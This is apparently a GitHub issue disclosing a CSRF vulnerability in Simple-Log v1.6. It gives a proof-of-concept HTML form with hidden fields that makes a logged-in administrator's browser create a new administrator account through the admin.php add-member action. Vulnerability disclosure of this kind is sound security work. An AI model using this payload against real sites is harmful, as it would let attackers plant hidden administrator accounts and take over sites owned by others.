Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
An issue was discovered in Simple-Log v1.6. There is a CSRF vulnerability that can add Administrator Account in the ' /admin/admin.php?act=act_add_member'.
Add Administrator Account Poc: Create account:test3 password:a123456
<form method="POST" id="transfer" action="http://127.0.0.1/Simple-Log/admin/admin.php?act=act_add_member"> <input type="hidden" name="user_name" value="test3" /> <input type="hidden" name="password" value="a123456" /> <input type="hidden" name="group" value="1" /> <input type="hidden" name="email" value="123@qq.com" /> <input type="hidden" name="button" value="提交" /> </form>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
An issue was discovered in Simple-Log v1.6. There is a CSRF vulnerability that can add Administrator Account in the ' /admin/admin.php?act=act_add_member'.
Add Administrator Account
Poc:
Create account:test3
password:a123456
The text was updated successfully, but these errors were encountered: